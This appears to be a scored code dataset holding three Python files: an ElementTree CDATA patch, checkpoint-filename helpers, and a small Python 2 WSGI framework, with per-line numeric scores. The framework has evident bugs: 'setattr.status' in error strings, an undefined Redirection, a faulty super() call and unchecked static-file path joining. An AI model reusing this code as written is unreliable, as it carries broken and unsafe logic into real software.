0.02631578947368421, 0.021739130434782608, 0.05, 0.045454545454545456, 0.041666666666666664, 0.034482758620689655, 0.02564102564102564, 0.02564102564102564, 0, 0.09090909090909091, 0.012658227848101266, 0.02631578947368421, 0.05, 0.058823529411764705, 0, 0.047619047619047616, 0, 0.034482758620689655, 0.07142857142857142, 0.07142857142857142, 0, 0.02564102564102564, 0.02631578947368421, 0.021739130434782608, 0.05, 0.1111111111111111, 0.03225806451612903, 0.015151515151515152, 0.037037037037037035, 0.045454545454545456, 0.1111111111111111, 0.030303030303030304, 0.014285714285714285, 0.037037037037037035, 0.045454545454545456, 0, 0.07142857142857142, 1 ]
505
0.041377
false
#!/usr/bin/env python #coding:utf-8 # Author: mozman # Purpose: a hack to generate XML containing CDATA by ElementTree # Created: 26.05.2012 # Copyright (C) 2012, Manfred Moitzi # License: MIT License # usage: # # from svgwrite.etree import etree, CDATA # # element = etree.Element('myTag') # element.append(CDATA("< and >")) # # assert etree.tostring(element) == "<myTag><![CDATA[< and >]]></myTag>" import sys PY3 = sys.version_info[0] > 2 import xml.etree.ElementTree as etree CDATA_TPL = "<![CDATA[%s]]>" CDATA_TAG = CDATA_TPL def CDATA(text): element = etree.Element(CDATA_TAG) element.text = text return element original_serialize_xml = etree._serialize_xml if PY3: def _serialize_xml_with_CDATA_support(write, elem, qnames, namespaces, **kwargs): if elem.tag == CDATA_TAG: write(CDATA_TPL % elem.text) else: original_serialize_xml(write, elem, qnames, namespaces, **kwargs) else: def _serialize_xml_with_CDATA_support(write, elem, encoding, qnames, namespaces): if elem.tag == CDATA_TAG: write(CDATA_TPL % elem.text.encode(encoding)) else: original_serialize_xml(write, elem, encoding, qnames, namespaces) # ugly, ugly, ugly patching etree._serialize_xml = _serialize_xml_with_CDATA_support
[ "#!/usr/bin/env python\n", "#coding:utf-8\n", "# Author: mozman\n", "# Purpose: a hack to generate XML containing CDATA by ElementTree\n", "# Created: 26.05.2012\n", "# Copyright (C) 2012, Manfred Moitzi\n", "# License: MIT License\n", "\n", "# usage:\n", "#\n", "# from svgwrite.etree import etree, CDATA\n", "#\n", "# element = etree.Element('myTag')\n", "# element.append(CDATA(\"< and >\"))\n", "#\n", "# assert etree.tostring(element) == \"<myTag><![CDATA[< and >]]></myTag>\"\n", "\n", "\n", "import sys\n", "PY3 = sys.version_info[0] > 2\n", "\n", "import xml.etree.ElementTree as etree\n", "\n", "CDATA_TPL = \"<![CDATA[%s]]>\"\n", "CDATA_TAG = CDATA_TPL\n", "\n", "\n", "def CDATA(text):\n", " element = etree.Element(CDATA_TAG)\n", " element.text = text\n", " return element\n", "\n", "original_serialize_xml = etree._serialize_xml\n", "\n", "if PY3:\n", " def _serialize_xml_with_CDATA_support(write, elem, qnames, namespaces, **kwargs):\n", " if elem.tag == CDATA_TAG:\n", " write(CDATA_TPL % elem.text)\n", " else:\n", " original_serialize_xml(write, elem, qnames, namespaces, **kwargs)\n", "else:\n", " def _serialize_xml_with_CDATA_support(write, elem, encoding, qnames, namespaces):\n", " if elem.tag == CDATA_TAG:\n", " write(CDATA_TPL % elem.text.encode(encoding))\n", " else:\n", " original_serialize_xml(write, elem, encoding, qnames, namespaces)\n", "\n", "# ugly, ugly, ugly patching\n", "etree._serialize_xml = _serialize_xml_with_CDATA_support\n" ]
[ 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0 ]
49
0.002913
false
 def stringize(x) : return str(x) if type(x) is not list and type(x) is not tuple else \ '-'.join(x) def buildPickleInterim(base, epoch, layer=None) : '''Create a structured name for the intermediate synapse.''' outName = base if layer is not None : outName += '_layer'+ str(layer) outName += '_epoch' + str(epoch) + '.pkl.gz' return outName def buildPickleFinal(base, appName, dataName, epoch, accuracy=None, cost=None) : '''Create a structured name for the final synapse.''' from os.path import splitext, basename outName = base + 'Final_' + \ str(splitext(basename(appName))[0]) + '_' + str(dataName) if accuracy is not None : outName += '_acc'+ str(accuracy) if cost is not None : outName += '_cost'+ str(cost) outName += '_epoch' + str(epoch) + '.pkl.gz' return outName def resumeEpoch(synapse) : '''Return the epoch number for this synapse file. If it cannot be determined, zero will be returned. ''' import re return 0 if synapse is None or 'epoch' not in synapse else \ int(re.findall(r'(?<=epoch)\d+', synapse)[0]) def resumeLayer(synapse) : '''Return the current layer for this synapse file. If it cannot be determined, zero will be returned. ''' import re return 0 if synapse is None or 'layer' not in synapse else \ int(re.findall(r'(?<=layer)\d+', synapse)[0])
[ "\n", "def stringize(x) :\n", " return str(x) if type(x) is not list and type(x) is not tuple else \\\n", " '-'.join(x)\n", "\n", "def buildPickleInterim(base, epoch, layer=None) :\n", " '''Create a structured name for the intermediate synapse.'''\n", " outName = base\n", " if layer is not None :\n", " outName += '_layer'+ str(layer)\n", " outName += '_epoch' + str(epoch) + '.pkl.gz'\n", " return outName\n", "\n", "def buildPickleFinal(base, appName, dataName, epoch, \n", " accuracy=None, cost=None) :\n", " '''Create a structured name for the final synapse.'''\n", " from os.path import splitext, basename\n", " outName = base + 'Final_' + \\\n", " str(splitext(basename(appName))[0]) + '_' + str(dataName)\n", " if accuracy is not None :\n", " outName += '_acc'+ str(accuracy)\n", " if cost is not None :\n", " outName += '_cost'+ str(cost)\n", " outName += '_epoch' + str(epoch) + '.pkl.gz'\n", " return outName\n", "\n", "def resumeEpoch(synapse) :\n", " '''Return the epoch number for this synapse file. If it cannot be \n", " determined, zero will be returned. \n", " '''\n", " import re\n", " return 0 if synapse is None or 'epoch' not in synapse else \\\n", " int(re.findall(r'(?<=epoch)\\d+', synapse)[0])\n", "\n", "def resumeLayer(synapse) :\n", " '''Return the current layer for this synapse file. If it cannot be \n", " determined, zero will be returned. \n", " '''\n", " import re\n", " return 0 if synapse is None or 'layer' not in synapse else \\\n", " int(re.findall(r'(?<=layer)\\d+', synapse)[0])\n" ]
[ 0, 0.05263157894736842, 0, 0, 0, 0.04, 0, 0, 0.037037037037037035, 0.025, 0, 0, 0, 0.037037037037037035, 0.02040816326530612, 0, 0, 0, 0.013888888888888888, 0.03333333333333333, 0.024390243902439025, 0.038461538461538464, 0.02631578947368421, 0, 0, 0, 0.07407407407407407, 0.014084507042253521, 0.023255813953488372, 0, 0, 0, 0.017543859649122806, 0, 0.07407407407407407, 0.013888888888888888, 0.023255813953488372, 0, 0, 0, 0.017543859649122806 ]
41
0.014786
false
#!/usr/bin/env python # -*- coding: utf-8 -*- import types import os import re import cgi import sys import time import datetime import functools import mimetypes import threading import logging import urllib import traceback try: from cStringIO import StringIO except ImportError: from StringIO import StringIO ctx = threading.local() class Dict(dict): def __init__(self, names=(), values=(), **kw): super(Dict, self).__init__(**kw) for k, v in zip(names, values): self[k] = v def __getattr__(self, key): try: return self[key] except KeyError: raise AttributeError(r"'Dict' object has no attribute '%s'" % key) def __setattr__(self, key, value): self[key] = value _TIMEDELTA_ZERO = datetime.timedelta(0) # timezone as UTC+8:00, UTC-10:00 _RE_TZ = re.compile('^([\+\-])([0-9]{1,2})\:([0-9]{1,2})$') class UTC(datetime.tzinfo): def __init__(self, utc): utc = str(utc.strip().upper()) mt = _RE_TZ.match(utc) if mt: minus = mt.group(1) == '-' h = int(mt.group(2)) m = int(mt.group(3)) if minus: h, m = (-h), (-m) self._utcoffset = datetime.timedelta(hours=h, minutes=m) self._tzname = 'UTC%s' % utc else: raise ValueError('bad utc time zone') def utcoffset(self, dt): return self._utcoffset def dst(self, dt): return _TIMEDELTA_ZERO def tzname(self, dt): return self._tzname def __str__(self): return 'UTC tzinfo object (%s)' % self._tzname __repr__ = __str__ # all known response statues: _RESPONSE_STATUSES = { # Informational 100: 'Continue', 101: 'Switching Protocols', 102: 'Processing', # Successful 200: 'OK', 201: 'Created', 202: 'Accepted', 203: 'Non-Authoritative Information', 204: 'No Content', 205: 'Reset Content', 206: 'Partial Content', 207: 'Multi Status', 226: 'IM Used', # Redirection 300: 'Multiple Choices', 301: 'Moved Permanently', 302: 'Found', 303: 'See Other', 304: 'Not Modified', 305: 'Use Proxy', 307: 'Temporary Redirect', # Client Error 400: 'Bad Request', 401: 'Unauthorized', 402: 'Payment Required', 403: 'Forbidden', 404: 'Not Found', 405: 'Method Not Allowed', 406: 
'Not Acceptable', 407: 'Proxy Authentication Required', 408: 'Request Timeout', 409: 'Conflict', 410: 'Gone', 411: 'Length Required', 412: 'Precondition Failed', 413: 'Request Entity Too Large', 414: 'Request URI Too Long', 415: 'Unsupported Media Type', 416: 'Requested Range Not Satisfiable', 417: 'Expectation Failed', 418: "I'm a teapot", 422: 'Unprocessable Entity', 423: 'Locked', 424: 'Failed Dependency', 426: 'Upgrade Required', # Server Error 500: 'Internal Server Error', 501: 'Not Implemented', 502: 'Bad Gateway', 503: 'Service Unavailable', 504: 'Gateway Timeout', 505: 'HTTP Version Not Supported', 507: 'Insufficient Storage', 510: 'Not Extended', } _RE_RESPONSE_STATUS = re.compile(r'^\d\d\d(\ [\w\ ]+)?$') _RESPONSE_HEADERS = ( 'Accept-Ranges', 'Age', 'Allow', 'Cache-Control', 'Connection', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Location', 'Content-MD5', 'Content-Disposition', 'Content-Range', 'Content-Type', 'Date', 'ETag', 'Expires', 'Last-Modified', 'Link', 'Location', 'P3P', 'Pragma', 'Proxy-Authenticate', 'Refresh', 'Retry-After', 'Server', 'Set-Cookie', 'Strict-Transport-Security', 'Trailer', 'Transfer-Encoding', 'Vary', 'Via', 'Warning', 'WWW-Authenticate', 'X-Frame-Options', 'X-XSS-Protection', 'X-Content-Type-Options', 'X-Forwarded-Proto', 'X-Powered-By', 'X-UA-Compatible', ) _RESPONSE_HEADER_DICT = dict( zip(map(lambda x: x.upper(), _RESPONSE_HEADERS), _RESPONSE_HEADERS)) _HEADER_X_POWERED_BY = ('X-Powered-By', 'transwarp/1.0') class HttpError(Exception): def __init__(self, code): super(HttpError, self).__init__() self.status = '%d %s' % (code, _RESPONSE_STATUSES[code]) def header(self, name, value): if not hasattr(self, '_headers'): self._headers = [_HEADER_X_POWERED_BY] self._headers.append((name, value)) @property def headers(self): if hasattr(self, '_headers'): return self._headers return [] def __str__(self): return setattr.status __repr__ = __str__ class RedirectError(HttpError): """docstring for RedirectError""" 
def __init__(self, code, location): super(RedirectError, self).__init__() self.location = location def __str__(self): return '%s, %s' % (setattr.status, self.location) __repr__ = __str__ def badrequest(): return HttpError(400) def unauthorized(): return HttpError(401) def forbidden(): return HttpError(403) def notfound(): return HttpError(404) def conflict(): return HttpError(409) def internalerror(): return HttpError(500) def redirect(location): return RedirectError(301, location) def found(logging): return Redirection(302, location) def seeother(location): return RedirectError(303, location) def _to_str(s): if isinstance(s, str): return s if isinstance(s, unicode): return s.encode('utf-8') return str(s) def _to_unicode(s, encoding='utf-8'): return s.decode('utf-8') def _quote(s, encoding='utf-8'): if isinstance(s, unicode): s = s.encode(encoding) return urllib.quote(s) def _unquote(s, encoding='utf-8'): return urllib.unquote(s).decode(encoding) def get(path): def _decorator(func): func.__web_route__ = path func.__web_method__ = 'GET' return func return _decorator def post(path): def _decorator(func): func.__web_route__ = path func.__web_method__ = 'POST' return func return _decorator _re_route = re.compile(r'(\:[a-zA-Z_]\w*)') def _build_regex(path): r''' Convert route path to regex. 
>>> _build_regex('/path/to/:file') '^\\/path\\/to\\/(?P<file>[^\\/]+)$' >>> _build_regex('/:user/:comments/list') '^\\/(?P<user>[^\\/]+)\\/(?P<comments>[^\\/]+)\\/list$' >>> _build_regex(':id-:pid/:w') '^(?P<id>[^\\/]+)\\-(?P<pid>[^\\/]+)\\/(?P<w>[^\\/]+)$' ''' re_list = ['^'] var_list = [] is_var = False for v in _re_route.split(path): if is_var: var_name = v[1:] var_list.append(var_name) re_list.append(r'(?P<%s>[^\/]+)' % var_name) else: s = '' for ch in v: if ch >= '0' and ch <= '9': s = s + ch elif ch >= 'A' and ch <= 'Z': s = s + ch elif ch >= 'a' and ch <= 'z': s = s + ch else: s = s + '\\' + ch re_list.append(s) is_var = not is_var re_list.append('$') return ''.join(re_list) class Route(object): def __init__(self, func): self.path = func.__web_route__ self.method = func.__web_method__ self.is_static = _re_route.search(self.path) is None if not self.is_static: self.route = re.compile(_build_regex(self.path)) self.func = func def match(self, url): m = self.route.match(url) if m: return m.groups() return None def __call__(self, *args): return self.func(*args) def __str__(self): if self.is_static: return 'Route(static,%s,path=%s)' % (self.method, self.path) return 'Route(dynamic,%s,path=%s)' % (self.method, self.path) __repr__ = __str__ def _static_file_generator(fpath): BLOCK_SIZE = 8192 with open(fpath, 'rb') as f: block = f.read(BLOCK_SIZE) while block: yield block block = f.read(BLOCK_SIZE) class StaticFileRoute(object): def __init__(self): self.method = 'GET' self.is_static = False self.route = re.compile('^/static/(.+)$') def match(self, url): if url.startswith('/static/'): return (url[1:],) return None def __call__(self, *args): fpath = os.path.join(ctx.application.document_root, args[0]) if not os.path.isfile(fpath): raise notfound() fext = os.path.splitext(fpath)[1] ctx.response.content_type = mimetypes.types_map.get( fext.lower(), 'application/octet-stream') return _static_file_generator(fpath) def favicon_handler(): return 
static_file_handler('/favicon.ico') class MultipartFile(object): def __init__(self, storage): self.filename = _to_unicode(storage.filename) self.file = storage.file class Request(object): def __init__(self, environ): self._environ = environ def _parse_input(self): def _convert(item): if isinstance(item, list): return [_to_unicode(i.value) for i in item] if item.filename: return MultipartFile(item) return _to_unicode(item.value) fs = cgi.FieldStorage( fp=self._environ['wsgi.input'], environ=self._environ, keep_blank_values=True) inputs = dict() for key in fs: inputs[key] = _convert(fs[key]) return inputs def _get_raw_input(self): if not hasattr(self, '_raw_input'): self._raw_input = self._parse_input() return self._raw_input def __getitem__(self, key): r = self._get_raw_input()[key] if isinstance(r, list): return r[0] return r def get(self, key, default=None): r = self._get_raw_input().get(key, default) if isinstance(r, list): return r[0] return r def gets(self, key): r = self._get_raw_input()[key] if isinstance(r, list): return r[:] return r def input(self, **kw): copy = Dict(**kw) raw = self._get_raw_input() for k, v in raw.iteritems(): copy[k] = v[0] if isinstance(v, list) else v return copy def get_body(self): fp = self._environ['wsgi.input'] return fp.read() @property def remote_addr(self): return self._environ.get('REMOTE_ADDR', '0.0.0.0') @property def document_root(self): return self._environ.get('DOCUMENT_ROOT', '') @property def query_string(self): return self._environ.get('QUERY_STRING', '') @property def environ(self): return self._environ @property def request_method(self): return self._environ['REQUEST_METHOD'] @property def path_info(self): return urllib.unquote(self._environ.get('PATH_INFO', '')) @property def host(self): return self._environ.get('HTTP_HOST', '') def _get_headers(self): if not hasattr(self, '_headers'): hdrs = {} for k, v in self._environ.iteritems(): if k.startswith('HTTP_'): hdrs[k[5:].replace('_', '-').upper()] = v.decode('utf-8') 
self._headers = hdrs return self._headers @property def headers(self): return dict(**self._get_headers()) def header(self, header, default=None): return self._get_headers().get(header.upper(), default) def _get_cookies(self): if not hasattr(self, '_cookies'): cookies = {} cookie_str = self._environ.get('HTTP_COOKIE') if cookie_str: for c in cookie_str.split(';'): pos = c.find('=') if pos > 0: cookies[c[:pos].strip()] = _unquote(c[pos+1:]) self._cookies = cookies return self._cookies @property def cookies(self): return Dict(**self._get_cookies()) def cookie(self, name, default=None): return self._get_cookies().get(name, default) UTC_0 = UTC('+00:00') class Response(object): def __init__(self): self._status = '200 OK' self._headers = {'CONTENT-TYPE': 'text/html; charset=utf-8'} def unset_header(self, name): key = name.upper() if key not in _RESPONSE_HEADER_DICT: key = name if key in self._headers: del self._headers[key] def set_header(self, name, value): key = name.upper() if key not in _RESPONSE_HEADER_DICT: key = name self._headers[key] = _to_str(value) def header(self, name): key = name.upper() if key not in _RESPONSE_HEADER_DICT: key = name return self._headers.get(key) @property def headers(self): L = [(_RESPONSE_HEADER_DICT.get(k, k), v) for k, v in self._headers.iteritems()] if hasattr(self, '_cookies'): for v in self._cookies.itervalues(): L.append(('Set-Cookie', v)) L.append(_HEADER_X_POWERED_BY) return L @property def content_type(self): return self.header('CONTENT-TYPE') @content_type.setter def content_type(self, value): if value: self.set_header('CONTENT-TYPE', value) else: self.unset_header('CONTENT-TYPE') @property def content_length(self): return self.header('CONTENT-LENGTH') @content_length.setter def content_length(self, value): self.set_header('CONTENT-LENGTH', str(value)) def delete_cookie(self, name): self.set_cookie(name, '__deleted__', expires=0) def set_cookie(self, name, value, max_age=None, expires=None, path='/', domain=None, secure=False, 
http_only=True): if not hasattr(self, '_cookies'): self._cookies = {} L = ['%s=%s' % (_quote(name), _quote(value))] if expires is not None: if isinstance(expires, (float, int, long)): L.append('Expires=%s' % datetime.datetime.fromtimestamp( expires, UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT')) if isinstance(expires, (datetime.date, datetime.datetime)): L.append('Expires=%s' % expires.astimezone( UTC_0).strftime('%a, %d-%b-%Y %H:%M:%S GMT')) elif isinstance(max_age, (int, long)): L.append('Max-Age=%d' % max_age) L.append('Path=%s' % path) if domain: L.append('Domain=%s' % domain) if secure: L.append('Secure') if http_only: L.append('HttpOnly') self._cookies[name] = '; '.join(L) def unset_cookie(self, name): if hasattr(self, '_cookies'): if name in self._cookies: del self._cookies[name] @property def status_code(self): return int(self._status[:3]) @property def status(self): return self._status @status.setter def status(self, value): if isinstance(value, (int, long)): if 100 <= value <= 999: st = _RESPONSE_STATUSES.get(value, '') if st: self._status = '%d %s' % (value, st) else: self._status = str(value) else: raise ValueError('Bad response code: %d' % value) elif isinstance(value, basestring): if isinstance(value, unicode): value = value.encode('utf-8') if _RE_RESPONSE_STATUS.match(value): self._status = value else: raise ValueError('Bad response code: %s' % value) else: raise TypeError('Bad type of response code.') class Template(object): def __init__(self, template_name, **kw): self.template_name = template_name self.model = dict(**kw) class TemplateEngine(object): def __call__(self, path, model): return '<!-- override this method to render template -->' class Jinja2TemplateEngine(TemplateEngine): def __init__(self, templ_dir, **kw): from jinja2 import Environment, FileSystemLoader if not 'autoescape' in kw: kw['autoescape'] = True self._env = Environment(loader=FileSystemLoader(templ_dir), **kw) def add_filter(self, name, fn_filter): self._env.filters[name] = 
fn_filter def __call__(self, path, model): return self._env.get_template(path).render(**model).encode('utf-8') def _default_error_handler(e, start_response, is_debug): if isinstance(e, HttpError): logging.info('HttpError: %s' % e.status) headers = e.headers[:] headers.append(('Content-Type', 'text/html')) start_response(e.status, headers) return ('<html><body><h1>%s</h1></body></html>' % e.status) logging.exception('Exception:') start_response('500 Internal Server Error', [ ('Content-Type', 'text/html'), _HEADER_X_POWERED_BY]) if is_debug: return _debug() return ('<html><body><h1>500 Internal Server Error</h1><h3>%s</h3></body></html>' % str(e)) def view(path): def _decorator(func): @functools.wraps(func) def _wrapper(*args, **kw): r = func(*args, **kw) if isinstance(r, dict): logging.info('return Template') return Template(path, **r) raise ValueError( 'Expect return a dict when using @view() decorator.') return _wrapper return _decorator _RE_INTERCEPTROR_STARTS_WITH = re.compile(r'^([^\*\?]+)\*?$') _RE_INTERCEPTROR_ENDS_WITH = re.compile(r'^\*([^\*\?]+)$') def _build_pattern_fn(pattern): m = _RE_INTERCEPTROR_STARTS_WITH.match(pattern) if m: return lambda p: p.startswith(m.group(1)) m = _RE_INTERCEPTROR_ENDS_WITH.match(pattern) if m: return lambda p: p.endswith(m.group(1)) raise ValueError('Invalid pattern definition in interceptor.') def interceptor(pattern='/'): def _decorator(func): func.__interceptor__ = _build_pattern_fn(pattern) return func return _decorator def _build_interceptor_fn(func, next): def _wrapper(): if func.__interceptor__(ctx.request.path_info): return func(next) else: return next() return _wrapper def _build_interceptor_chain(last_fn, *interceptors): L = list(interceptors) L.reverse() fn = last_fn for f in L: fn = _build_interceptor_fn(f, fn) return fn def _load_module(model_name): last_dot = model_name.rfind('.') if last_dot == (-1): return __import__(model_name, globals(), locals()) from_module = model_name[:last_dot] import_module = 
model_name[last_dot+1:] m = __import__(from_module, globals(), locals(), [import_module]) return getattr(m, import_module) class WSGIApplication(object): def __init__(self, document_root=None, **kw): self._running = False self._document_root = document_root self._interceptors = [] self._templage_engine = None self._get_static = {} self._post_static = {} self._get_dynamic = [] self._post_dynamic = [] def _check_not_running(self): if self._running: raise RuntimeError('Cannot modify WSGIApplication when running.') @property def template_engine(self): return self._templage_engine @template_engine.setter def template_engine(self, engine): self._check_not_running() self._templage_engine = engine def add_module(self, mod): self._check_not_running() m = mod if type(mod) == types.ModuleType else _load_module(mod) logging.info('Add module: %s' % m.__name__) for name in dir(m): fn = getattr(m, name) if callable(fn) and hasattr(fn, '__web_route__') and hasattr(fn, '__web_method__'): self.add_url(fn) def add_url(self, func): self._check_not_running() route = Route(func) if route.is_static: if route.method == 'GET': self._get_static[route.path] = route if route.method == 'POST': self._post_static[route.path] = route else: if route.method == 'GET': self._get_dynamic.append(route) if route.method == 'POST': self._post_dynamic.append(route) logging.info('Add route: %s' % str(route)) def add_interceptor(self, func): self._check_not_running() self._interceptors.append(func) logging.info('Add interceptor: %s' % str(func)) def get_wsgi_application(self, debug=False): self._check_not_running() if debug: self._get_dynamic.append(StaticFileRoute()) self._running = True _application = Dict(document_root=self._document_root) def fn_route(): request_method = ctx.request.request_method path_info = ctx.request.path_info if request_method == 'GET': fn = self._get_static.get(path_info, None) if fn: return fn() for fn in self._get_dynamic: args = fn.match(path_info) if args: return fn(*args) 
raise notfound() if request_method == 'POST': fn = self._post_static.get(path_info, None) if fn: return fn() for fn in self._post_dynamic: args = fn.match(path_info) if args: return fn(*args) raise notfound() raise badrequest() fn_exec = _build_interceptor_chain(fn_route, *self._interceptors) def wsig(env, start_response): ctx.application = _application ctx.request = Request(env) response = ctx.response = Response() try: r = fn_exec() if isinstance(r, Template): r = self._templage_engine(r.template_name, r.model) if isinstance(r, unicode): r = r.encode('utf-8') if r is None: r = [] start_response(response.status, response.headers) return r except RedirectError, e: response.set_header('Location', e.location) start_response(e.status, response.headers) return [] except HttpError, e: start_response(e.status, response.headers) return ['<html><body><h1>', e.status, '</h1></body></html>'] except Exception, e: logging.exception(e) if not debug: start_response('500 Internal Server Error', []) return ['<html><body><h1>500 Internal Server Error</h1></body></html>'] exc_type, exc_value, exc_traceback = sys.exc_info() fp = StringIO() traceback.print_exception( exc_type, exc_value, exc_traceback, file=fp) stacks = fp.getvalue() fp.close() start_response('500 Internal Server Error', []) return [ r'''<html><body><h1>500 Internal Server Error</h1><div style="font-family:Monaco, Menlo, Consolas, 'Courier New', monospace;"><pre>''', stacks.replace('<', '&lt;').replace('>', '&gt;'), '</pre></div></body></html>'] finally: del ctx.application del ctx.request del ctx.response # status = '200 OK' # response_headers = [ # ('Content-Type', 'text/plain') # ] # start_response(status, response_headers) # return ['Hello world from wsgia!\n'] return wsig def run(self, port=9000, host='127.0.0.1'): from wsgiref.simple_server import make_server print('application (%s) will start at %s:%s...' 
% (self._document_root, host, port)) server = make_server( host, port, self.get_wsgi_application(debug=True)) server.serve_forever() wsgi = WSGIApplication(os.path.dirname(os.path.abspath(__file__))) if __name__ == '__main__': wsgi.run()
[ "#!/usr/bin/env python\n", "# -*- coding: utf-8 -*-\n", "\n", "import types\n", "import os\n", "import re\n", "import cgi\n", "import sys\n", "import time\n", "import datetime\n", "import functools\n", "import mimetypes\n", "import threading\n", "import logging\n", "import urllib\n", "import traceback\n", "\n", "try:\n", " from cStringIO import StringIO\n", "except ImportError:\n", " from StringIO import StringIO\n", "\n", "ctx = threading.local()\n", "\n", "\n", "class Dict(dict):\n", "\n", " def __init__(self, names=(), values=(), **kw):\n", " super(Dict, self).__init__(**kw)\n", " for k, v in zip(names, values):\n", " self[k] = v\n", "\n", " def __getattr__(self, key):\n", " try:\n", " return self[key]\n", " except KeyError:\n", " raise AttributeError(r\"'Dict' object has no attribute '%s'\" % key)\n", "\n", " def __setattr__(self, key, value):\n", " self[key] = value\n", "\n", "\n", "_TIMEDELTA_ZERO = datetime.timedelta(0)\n", "\n", "# timezone as UTC+8:00, UTC-10:00\n", "\n", "_RE_TZ = re.compile('^([\\+\\-])([0-9]{1,2})\\:([0-9]{1,2})$')\n", "\n", "\n", "class UTC(datetime.tzinfo):\n", "\n", " def __init__(self, utc):\n", " utc = str(utc.strip().upper())\n", " mt = _RE_TZ.match(utc)\n", " if mt:\n", " minus = mt.group(1) == '-'\n", " h = int(mt.group(2))\n", " m = int(mt.group(3))\n", " if minus:\n", " h, m = (-h), (-m)\n", " self._utcoffset = datetime.timedelta(hours=h, minutes=m)\n", " self._tzname = 'UTC%s' % utc\n", " else:\n", " raise ValueError('bad utc time zone')\n", "\n", " def utcoffset(self, dt):\n", " return self._utcoffset\n", "\n", " def dst(self, dt):\n", " return _TIMEDELTA_ZERO\n", "\n", " def tzname(self, dt):\n", " return self._tzname\n", "\n", " def __str__(self):\n", " return 'UTC tzinfo object (%s)' % self._tzname\n", "\n", " __repr__ = __str__\n", "\n", "# all known response statues:\n", "\n", "_RESPONSE_STATUSES = {\n", " # Informational\n", " 100: 'Continue',\n", " 101: 'Switching Protocols',\n", " 102: 'Processing',\n", "\n", " # 
Successful\n", " 200: 'OK',\n", " 201: 'Created',\n", " 202: 'Accepted',\n", " 203: 'Non-Authoritative Information',\n", " 204: 'No Content',\n", " 205: 'Reset Content',\n", " 206: 'Partial Content',\n", " 207: 'Multi Status',\n", " 226: 'IM Used',\n", "\n", " # Redirection\n", " 300: 'Multiple Choices',\n", " 301: 'Moved Permanently',\n", " 302: 'Found',\n", " 303: 'See Other',\n", " 304: 'Not Modified',\n", " 305: 'Use Proxy',\n", " 307: 'Temporary Redirect',\n", "\n", " # Client Error\n", " 400: 'Bad Request',\n", " 401: 'Unauthorized',\n", " 402: 'Payment Required',\n", " 403: 'Forbidden',\n", " 404: 'Not Found',\n", " 405: 'Method Not Allowed',\n", " 406: 'Not Acceptable',\n", " 407: 'Proxy Authentication Required',\n", " 408: 'Request Timeout',\n", " 409: 'Conflict',\n", " 410: 'Gone',\n", " 411: 'Length Required',\n", " 412: 'Precondition Failed',\n", " 413: 'Request Entity Too Large',\n", " 414: 'Request URI Too Long',\n", " 415: 'Unsupported Media Type',\n", " 416: 'Requested Range Not Satisfiable',\n", " 417: 'Expectation Failed',\n", " 418: \"I'm a teapot\",\n", " 422: 'Unprocessable Entity',\n", " 423: 'Locked',\n", " 424: 'Failed Dependency',\n", " 426: 'Upgrade Required',\n", "\n", " # Server Error\n", " 500: 'Internal Server Error',\n", " 501: 'Not Implemented',\n", " 502: 'Bad Gateway',\n", " 503: 'Service Unavailable',\n", " 504: 'Gateway Timeout',\n", " 505: 'HTTP Version Not Supported',\n", " 507: 'Insufficient Storage',\n", " 510: 'Not Extended',\n", "}\n", "\n", "_RE_RESPONSE_STATUS = re.compile(r'^\\d\\d\\d(\\ [\\w\\ ]+)?$')\n", "\n", "_RESPONSE_HEADERS = (\n", " 'Accept-Ranges',\n", " 'Age',\n", " 'Allow',\n", " 'Cache-Control',\n", " 'Connection',\n", " 'Content-Encoding',\n", " 'Content-Language',\n", " 'Content-Length',\n", " 'Content-Location',\n", " 'Content-MD5',\n", " 'Content-Disposition',\n", " 'Content-Range',\n", " 'Content-Type',\n", " 'Date',\n", " 'ETag',\n", " 'Expires',\n", " 'Last-Modified',\n", " 'Link',\n", " 
'Location',\n", " 'P3P',\n", " 'Pragma',\n", " 'Proxy-Authenticate',\n", " 'Refresh',\n", " 'Retry-After',\n", " 'Server',\n", " 'Set-Cookie',\n", " 'Strict-Transport-Security',\n", " 'Trailer',\n", " 'Transfer-Encoding',\n", " 'Vary',\n", " 'Via',\n", " 'Warning',\n", " 'WWW-Authenticate',\n", " 'X-Frame-Options',\n", " 'X-XSS-Protection',\n", " 'X-Content-Type-Options',\n", " 'X-Forwarded-Proto',\n", " 'X-Powered-By',\n", " 'X-UA-Compatible',\n", ")\n", "\n", "_RESPONSE_HEADER_DICT = dict(\n", " zip(map(lambda x: x.upper(), _RESPONSE_HEADERS), _RESPONSE_HEADERS))\n", "\n", "_HEADER_X_POWERED_BY = ('X-Powered-By', 'transwarp/1.0')\n", "\n", "\n", "class HttpError(Exception):\n", "\n", " def __init__(self, code):\n", " super(HttpError, self).__init__()\n", " self.status = '%d %s' % (code, _RESPONSE_STATUSES[code])\n", "\n", " def header(self, name, value):\n", " if not hasattr(self, '_headers'):\n", " self._headers = [_HEADER_X_POWERED_BY]\n", " self._headers.append((name, value))\n", "\n", " @property\n", " def headers(self):\n", " if hasattr(self, '_headers'):\n", " return self._headers\n", " return []\n", "\n", " def __str__(self):\n", " return setattr.status\n", "\n", " __repr__ = __str__\n", "\n", "\n", "class RedirectError(HttpError):\n", "\n", " \"\"\"docstring for RedirectError\"\"\"\n", "\n", " def __init__(self, code, location):\n", " super(RedirectError, self).__init__()\n", " self.location = location\n", "\n", " def __str__(self):\n", " return '%s, %s' % (setattr.status, self.location)\n", "\n", " __repr__ = __str__\n", "\n", "\n", "def badrequest():\n", " return HttpError(400)\n", "\n", "\n", "def unauthorized():\n", " return HttpError(401)\n", "\n", "\n", "def forbidden():\n", " return HttpError(403)\n", "\n", "\n", "def notfound():\n", " return HttpError(404)\n", "\n", "\n", "def conflict():\n", " return HttpError(409)\n", "\n", "\n", "def internalerror():\n", " return HttpError(500)\n", "\n", "\n", "def redirect(location):\n", " return 
